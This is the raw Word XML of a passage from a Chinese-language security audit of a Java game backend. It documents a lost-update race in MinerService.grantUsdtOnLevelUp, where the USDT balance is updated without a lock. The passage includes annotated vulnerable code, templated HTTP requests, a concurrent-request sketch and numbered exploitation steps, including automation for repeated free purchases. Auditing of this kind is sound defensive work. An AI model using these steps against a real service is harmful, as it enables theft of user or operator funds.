              <w:br/>
              <w:t>@Transactional  // ← 自调用时 @Transactional 被忽略，实际使用 synthesize 的事务</w:t>
              <w:br/>
              <w:t>public void recalcUserLevelAndHashRate(Long userId) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    List&lt;UserMiner&gt; miners = userMinerRepository.findByUserIdAndInStorage(userId, 0); // ← 无 UserAccount 锁</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    int maxLevel </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>= miners.stream().mapToInt(UserMiner::getMinerLevel).max().orElse(0);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal totalHash = computeBaseTotalHashRate(userId);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">    userRepository.findByIdForUpdate(userId).ifPresent(u -&gt; {  // ← User 行锁（正确，防止并发升级重复发奖）</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int oldLevel = u.getCurrentLevel() != null ? u.getCurrentLevel() : 0;</w:t>
              <w:br/>
              <w:t xml:space="preserve">        int userNewLevel = Math.max(maxLevel, oldLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        u.setCurrentLevel(userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userRepository.save(u);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        if (userNewLevel &gt; oldLevel) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            grantUsdtOnLevelUp(userId, oldLevel + 1, userNewLevel); // ← User 行锁内调用，但 UserAccount 仍无锁</w:t>
              <w:br/>
              <w:t xml:space="preserve">            levelRewardService.claimLevelReward(userId, userNewLevel);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    });</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ④ 漏洞 sink：MinerService.java — grantUsdtOnLevelUp</w:t>
              <w:br/>
              <w:t>// 注释原文："须在 recalc 的 User 行锁内调用，勿再锁 account 以免与 purchase 死锁"</w:t>
              <w:br/>
              <w:t>// ↑ 此注释明确承认：purchase 路径不持有 User 锁，两者直接并发读写 UserAccount</w:t>
              <w:br/>
              <w:t>private void grantUsdtOnLevelUp(Long userId, int fromLevel, int toLevel) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    UserAccount account = userAccountRepository.findByUserId(userId).orElse(null); // ← ❌ 无 FOR UPDATE，无 @Version</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (account == null) return;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    User user = userRepository.findById(userId).orElse(null);</w:t>
              <w:br/>
              <w:t xml:space="preserve">    ...</w:t>
              <w:br/>
              <w:t xml:space="preserve">    BigDecimal total = BigDecimal.ZERO;</w:t>
              <w:br/>
              <w:t xml:space="preserve">    for (int level = fromLevel; level &lt;= toLevel; level++) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        BigDecimal amt = usdtLevelConfigRepository.findByRegionIdAndLevel(regionId, level)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .map(UsdtLevelConfig::getEstimatedUsdt)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .filter(a -&gt; a != null &amp;&amp; a.compareTo(BigDecimal.ZERO) &gt; 0)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                .orElse(BigDecimal.ZERO);</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">       total = total.add(amt);                                  // ← 基于 t₀ 时刻读到的 B₀ 累加奖励</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t xml:space="preserve">    if (total.compareTo(BigDecimal.ZERO) &gt; 0) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setUsdtBalance(                                  // ← ❌ 计算时 T2 的扣款可能已提交但此处不可见</w:t>
              <w:br/>
              <w:t xml:space="preserve">                account.getUsdtBalance() != null</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        ? account.getUsdtBalance().add(total)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        : total);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        account.setUsdtTotalBalance(</w:t>
              <w:br/>
              <w:t xml:space="preserve">                account.getUsdtTotalBalance() != null</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        ? account.getUsdtTotalBalance().add(total)</w:t>
              <w:br/>
              <w:t xml:space="preserve">                        : total);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userAccountRepository.save(account);                     // ← ❌ 标准 save，最后写入者胜出，覆盖 T2 已提交的扣款</w:t>
              <w:br/>
              <w:t xml:space="preserve">        balancePushService.pushBalance(userId);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i w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备条件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：攻击者账户在 slot 1、slot 2 各放置一台同等级矿机，且合成后等级将超过用户 currentLevel（触发升级奖励）；账户中有足够 USDT 发起购买。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 1（合成，触发 USDT 升级发放 T1）：</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/api/miner/synthesize HTTP/1.1</w:t>
              <w:br/>
              <w:t>Host: &lt;target_host&gt;</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;攻击者有效 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
              <w:t>X-App-Key: &lt;appKey&gt;</w:t>
              <w:br/>
              <w:t>X-Timestamp: &lt;timestamp&gt;</w:t>
              <w:br/>
              <w:t>X-Nonce: &lt;nonce&gt;</w:t>
              <w:br/>
              <w:t>X-Sign: &lt;sign&gt;</w:t>
              <w:br/>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{"slotA":1,"slotB":2}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>请求 2（并发消费 USDT 的操作，在 T1 读取 UserAccount 后、T1 提交前到达，触发 Lost Update）：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/api/&lt;USDT消费接口&gt;  （该接口未包含在本次审计代码范围内，具体路径需结合 purchase/提现相关模块确认）</w:t>
              <w:br/>
              <w:t>Authorization: Bearer &lt;同一用户 Token&gt;</w:t>
              <w:br/>
              <w:t>Content-Type: application/json</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>...（消费 USDT 的请求体）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发执行脚本示意：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使用任意 HTTP 并发客户端同时发出两个请求</w:t>
              <w:br/>
              <w:t>Thread-1: POST /api/miner/synthesize  → slotA=1, slotB=2</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Thread-2: POST /api/&lt;purchase&gt;         → 消费一定数量 USDT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>📝 利用步骤：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="343"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>准备阶段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：确保 slot 1 和 slot 2 各有一台等级为 N 的矿机，且用户 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>currentLevel &lt; N+1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（确保合成后触发升级奖励）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="344"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>记录初始余额</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：查询当前 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance = B₀</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="345"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>并发发送</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：用脚本在同一毫秒级窗口同时发送"矿机合成请求（T1）"和"消费 USDT 请求（T2）"；T2 的目标是在 T1 读取 UserAccount 之后、T1 事务提交之前完成提交。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="346"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>观察结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">：竞态成功时，最终 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtBalance = B₀ + levelReward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（T2 的扣款 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>B₀ - cost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 被 T1 覆盖），同时购买商品也已入账。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>批量化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：通过自动化脚本重复第 1–4 步（每次合成消耗矿机，需持续补充矿机资源），每次成功竞态相当于免费完成一次购买。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="34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349"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：普通已登录用户，无需管理员权限</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="350"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>前置条件：拥有同等级的两台矿机（正常游戏进程即可获得）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>&gt; 📎 该 sink 另有 8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受影响调用链（9 条）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="351"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.synthesize → MinerService.java.synthesize → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getChargeAccelerationRatio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="352"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.synthesize → MinerService.java.synthesize → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getStarBonusPercent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="353"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.synthesize → MinerService.java.synthesize → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getBaseOutputForLevel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="354"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.sell → MinerService.java.sell → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getStarBonusPercent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="355"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.moveToStorage → MinerService.java.moveToStorage → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getChargeAccelerationRatio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="356"/>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MinerService.java.computeBaseTotalHashRate → MinerService.java.getChargeAccelerationRatio</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="357"/>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MinerService.java.computeBaseTotalHashRate → MinerService.java.getStarBonusPercent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="358"/>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MinerService.java.computeBaseTotalHashRate → MinerService.java.getBaseOutputForLevel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="359"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>MinerController.java.move → MinerService.java.moveToSlot → MinerService.java.recalcUserLevelAndHashRate → MinerService.java.computeBaseTotalHashRate → MinerService.java.getStarBonusPercent</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audit_m147_476_synthesize_ctrl-path1of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m147_496_synthesize_ctrl-path2of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m147_508_synthesize_ctrl-path3of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m148_502_sell_ctrl-path3of8.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m151_491_moveToStorage_ctrl-path1of5.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m152_495_takeFromStorage_ctrl-path1of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m152_505_takeFromStorage_ctrl-path2of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m152_513_takeFromStorage_ctrl-path3of6.md</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>audit_m153_518_move_ctrl-path2of6.md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：MinerService.java#grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_18" w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞17：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>grantUsdtOnLevelUp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> 中 UserAccount 余额更新缺乏行锁导致 Lost Update 竞态（USDT 资金安全）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="36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：升级 USDT 奖励发放时 UserAccount 余额无锁读-改-写，存在 Lost Update 竞态导致用户余额异常</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="36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src/main/java/com/gameBack/mjservice/service/MinerService.java:grantUsdtOnLevelUp</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="36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 / Lost Update）</w:t>
